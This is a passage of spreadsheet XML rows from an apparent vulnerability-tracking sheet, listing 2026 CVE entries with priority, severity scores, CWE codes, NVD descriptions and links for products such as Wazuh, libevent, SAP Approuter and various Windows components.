      <c r="K3367" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L3367" s="5" t="inlineStr">
        <is>
          <t>On the Trusted Firmware-M (TF-M) 2 through 2.3.0 platform before 00d1b3e, mailbox initialization on PSOC64 and RP2350 accepts a non-secure, unvalidated, supplied pointer.</t>
        </is>
      </c>
      <c r="M3367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54467</t>
        </is>
      </c>
    </row>
    <row r="3368">
      <c r="A3368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58230</t>
        </is>
      </c>
      <c r="C3368" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3368" s="5" t="inlineStr"/>
      <c r="F3368" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3368" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3368" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I3368" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3368" s="5" t="inlineStr"/>
      <c r="K3368" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L3368" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate certain token content under specific configurations. An unauthenticated attacker could send a specially crafted token to cause sensitive credential material to be sent to an attacker-controlled destination. The attack complexity is high due to non-default preconditions required in the target environment. This results in a high impact on confidentiality and a low impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M3368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58230</t>
        </is>
      </c>
    </row>
    <row r="3369">
      <c r="A3369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58848</t>
        </is>
      </c>
      <c r="C3369" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3369" s="5" t="inlineStr"/>
      <c r="F3369" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3369" s="5" t="inlineStr"/>
      <c r="H3369" s="5" t="inlineStr"/>
      <c r="I3369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3369" s="5" t="inlineStr"/>
      <c r="K3369" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3369" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M3369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t>
        </is>
      </c>
    </row>
    <row r="3370">
      <c r="A3370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61783</t>
        </is>
      </c>
      <c r="C3370" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3370" s="5" t="inlineStr"/>
      <c r="F3370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3370" s="5" t="inlineStr"/>
      <c r="H3370" s="5" t="inlineStr"/>
      <c r="I3370" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3370" s="5" t="inlineStr"/>
      <c r="K3370" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L3370" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.14.0 through 4.14.6, an authenticated low-privilege user can read the cluster secret from the manager configuration because the logic that masks sensitive values is disabled by any update-config RBAC rule, including an explicit deny. The mask_sensitive_config() decorator applies masking only when _has_update_permissions() returns false, but that gate treats a user as able to update the config whenever a  manager:update_config  or  cluster:update_config  rule exists, without ever checking whether the rule's effect is allow or deny. Because a deny rule is stored as a real entry, a read-only account that is hardened by explicitly denying config edits is counted as having update permission, which turns masking off. A single authenticated GET request to the configuration endpoint with  raw=true  then returns the verbatim ossec.conf XML with  cluster.key  in clear, whereas an otherwise identical account without the deny rule sees the value masked. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M3370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61783</t>
        </is>
      </c>
    </row>
    <row r="3371">
      <c r="A3371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62653</t>
        </is>
      </c>
      <c r="C3371" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3371" s="5" t="inlineStr"/>
      <c r="F3371" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3371" s="5" t="inlineStr"/>
      <c r="H3371" s="5" t="inlineStr"/>
      <c r="I3371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3371" s="5" t="inlineStr"/>
      <c r="K3371" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3371" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The input received over a proprietary communication protocol that is exposed when the device is placed into a special firmware-update mode is not properly validated, resulting in a memory corruption condition. This could allow an unauthenticated attacker with physical access to the device to cause a crash and potentially execute arbitrary code on the device.</t>
        </is>
      </c>
      <c r="M3371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t>
        </is>
      </c>
    </row>
    <row r="3372">
      <c r="A3372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62654</t>
        </is>
      </c>
      <c r="C3372" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3372" s="5" t="inlineStr"/>
      <c r="F3372" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3372" s="5" t="inlineStr"/>
      <c r="H3372" s="5" t="inlineStr"/>
      <c r="I3372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3372" s="5" t="inlineStr"/>
      <c r="K3372" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L3372" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A special maintenance mode can be activated via a physical key sequence during device boot, in which the device downloads and executes program code from a network server without verifying its authenticity or integrity. This could allow an attacker with physical access to the device to upload and execute arbitrary, unsigned code.</t>
        </is>
      </c>
      <c r="M3372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t>
        </is>
      </c>
    </row>
    <row r="3373">
      <c r="A3373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="C3373" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3373" s="5" t="inlineStr"/>
      <c r="F3373" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3373" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3373" s="5" t="inlineStr"/>
      <c r="I3373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3373" s="5" t="inlineStr"/>
      <c r="K3373" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3373" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="3374">
      <c r="A3374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62727</t>
        </is>
      </c>
      <c r="C3374" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3374" s="5" t="inlineStr"/>
      <c r="F3374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3374" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H337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374" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3374" s="5" t="inlineStr"/>
      <c r="K3374" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3374" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62727</t>
        </is>
      </c>
    </row>
    <row r="3375">
      <c r="A3375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63387</t>
        </is>
      </c>
      <c r="C3375" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3375" s="5" t="inlineStr"/>
      <c r="F3375" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3375" s="5" t="inlineStr"/>
      <c r="H3375" s="5" t="inlineStr"/>
      <c r="I3375" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3375" s="5" t="inlineStr"/>
      <c r="K3375" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="L3375" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an off-by-one stack buffer overflow in evdns.c when dnsname_to_labels formats a name-bearing DNS record at the end of the 64 KB stack buffer allocated by evdns_server_request_format_response. The final-label check permits j plus label_len plus one to equal buf_len, after which the terminating null byte is written to buf[buf_len]. A crafted DNS server response containing PTR, CNAME, MX, NS, or SOA data can trigger the one-byte out-of-bounds write and crash or corrupt the process. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M3375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63387</t>
        </is>
      </c>
    </row>
    <row r="3376">
      <c r="A3376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63424</t>
        </is>
      </c>
      <c r="C3376" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3376" s="5" t="inlineStr"/>
      <c r="F3376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3376" s="5" t="inlineStr"/>
      <c r="H3376" s="5" t="inlineStr">
        <is>
          <t>lenovo:dock_manager</t>
        </is>
      </c>
      <c r="I3376" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3376" s="5" t="inlineStr"/>
      <c r="K3376" s="5" t="inlineStr">
        <is>
          <t>CWE-261</t>
        </is>
      </c>
      <c r="L3376" s="5" t="inlineStr">
        <is>
          <t>During an internal security assessment, an improperly protected key was discovered in Lenovo Dock Manager that could allow a local authenticated user to escalate privileges.</t>
        </is>
      </c>
      <c r="M3376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63424</t>
        </is>
      </c>
    </row>
    <row r="3377">
      <c r="A3377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="C3377" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3377" s="5" t="inlineStr"/>
      <c r="F3377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3377" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3377" s="5" t="inlineStr"/>
      <c r="I3377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3377" s="5" t="inlineStr"/>
      <c r="K3377" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3377" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="3378">
      <c r="A3378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="C3378" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3378" s="5" t="inlineStr"/>
      <c r="F3378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3378" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3378" s="5" t="inlineStr"/>
      <c r="I3378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3378" s="5" t="inlineStr"/>
      <c r="K3378" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3378" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="3379">
      <c r="A3379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="C3379" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3379" s="5" t="inlineStr"/>
      <c r="F3379" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3379" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3379" s="5" t="inlineStr"/>
      <c r="I3379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3379" s="5" t="inlineStr"/>
      <c r="K3379" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3379" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="3380">
      <c r="A3380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="C3380" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3380" s="5" t="inlineStr"/>
      <c r="F3380" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3380" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3380" s="5" t="inlineStr"/>
      <c r="I3380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3380" s="5" t="inlineStr"/>
      <c r="K3380" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3380" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="3381">
      <c r="A3381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="C3381" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3381" s="5" t="inlineStr"/>
      <c r="F3381" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3381" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3381" s="5" t="inlineStr"/>
      <c r="I3381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3381" s="5" t="inlineStr"/>
      <c r="K3381" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3381" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="3382">
      <c r="A3382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="C3382" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3382" s="5" t="inlineStr"/>
      <c r="F3382" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3382" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3382" s="5" t="inlineStr"/>
      <c r="I3382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3382" s="5" t="inlineStr"/>
      <c r="K3382" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3382" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="3383">
      <c r="A3383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68897</t>
        </is>
      </c>
      <c r="C3383" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3383" s="5" t="inlineStr"/>
      <c r="F3383" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3383" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3383" s="5" t="inlineStr"/>
      <c r="I3383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3383" s="5" t="inlineStr"/>
      <c r="K3383" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3383" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t>
        </is>
      </c>
    </row>
    <row r="3384">
      <c r="A3384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69275</t>
        </is>
      </c>
      <c r="C3384" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3384" s="5" t="inlineStr"/>
      <c r="F3384" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3384" s="5" t="inlineStr"/>
      <c r="H3384" s="5" t="inlineStr"/>
      <c r="I3384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3384" s="5" t="inlineStr"/>
      <c r="K3384" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3384" s="5" t="inlineStr">
        <is>
          <t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t>
        </is>
      </c>
    </row>
    <row r="3385">
      <c r="A3385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69279</t>
        </is>
      </c>
      <c r="C3385" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3385" s="5" t="inlineStr"/>
      <c r="F3385" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3385" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3385" s="5" t="inlineStr"/>
      <c r="I3385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3385" s="5" t="inlineStr"/>
      <c r="K3385" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3385" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t>
        </is>
      </c>
    </row>
    <row r="3386">
      <c r="A3386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69280</t>
        </is>
      </c>
      <c r="C3386" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3386" s="5" t="inlineStr"/>
      <c r="F3386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3386" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3386" s="5" t="inlineStr"/>
      <c r="I3386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3386" s="5" t="inlineStr"/>
      <c r="K3386" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3386" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t>
        </is>
      </c>
    </row>
    <row r="3387">
      <c r="A3387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69281</t>
        </is>
      </c>
      <c r="C3387" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3387" s="5" t="inlineStr"/>
      <c r="F3387" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3387" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3387" s="5" t="inlineStr"/>
      <c r="I3387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3387" s="5" t="inlineStr"/>
      <c r="K3387" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3387" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t>
        </is>
      </c>
    </row>
    <row r="3388">
      <c r="A3388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="C3388" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3388" s="5" t="inlineStr"/>
      <c r="F3388" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3388" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3388" s="5" t="inlineStr"/>
      <c r="I3388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3388" s="5" t="inlineStr"/>
      <c r="K3388" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3388" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="3389">
      <c r="A3389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69292</t>
        </is>
      </c>
      <c r="C3389" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3389" s="5" t="inlineStr"/>
      <c r="F3389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3389" s="5" t="inlineStr"/>
      <c r="H3389" s="5" t="inlineStr"/>
      <c r="I3389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3389" s="5" t="inlineStr"/>
      <c r="K3389" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3389" s="5" t="inlineStr">
        <is>
          <t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t>
        </is>
      </c>
    </row>
    <row r="3390">
      <c r="A3390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69299</t>
        </is>
      </c>
      <c r="C3390" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3390" s="5" t="inlineStr"/>
      <c r="F3390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3390" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3390" s="5" t="inlineStr"/>
      <c r="I3390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3390" s="5" t="inlineStr"/>
      <c r="K3390" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3390" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
